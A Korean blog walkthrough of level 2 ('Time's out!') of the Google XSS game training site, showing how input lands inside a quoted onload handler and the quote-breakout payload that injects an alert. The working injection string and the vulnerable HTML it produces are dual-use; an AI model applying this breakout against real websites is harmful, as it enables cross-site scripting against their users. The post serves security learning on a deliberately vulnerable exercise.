사자자리

[XSS game] 2. Time's out! 본문

웹해킹/XSS game

[XSS game] 2. Time's out!

renne 2022. 8. 13. 22:01

http://www.xssgame.com/WrfpuKFX8GNr

 

로그인 - Google 계정

이메일 또는 휴대전화

accounts.google.com

 

<script>alert('SUCCESS');</script> 입력

 

입력한 데이터가 그대로 출력된다.

 

<img id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('<script>alert('SUCCESS');</script>');">

Inspect에서 코드를 보니, 입력한 데이터가 작은따옴표( ' ' )로 감싸였다.

 

');alert('SUCCESS');(' 입력

 

성공

<img id="loading" src="/static/img/loading.gif" style="width: 50%; display: none;" onload="startTimer('');alert('SUCCESS');('');">

 

http://www.xssgame.com/u0hrDTsXmyVJ

 

로그인 - Google 계정

이메일 또는 휴대전화

accounts.google.com

 

저작자표시 (새창열림)

'웹해킹 > XSS game' 카테고리의 다른 글

[XSS game] 4. Google Reader  (0) 2022.08.23
[XSS game] 3. Gallery  (0) 2022.08.22
[XSS game] 1. Foogle  (0) 2022.08.13
[XSS game] Level 1: Hello, world of XSS  (0) 2022.08.09
'웹해킹/XSS game' Related Articles more
Comments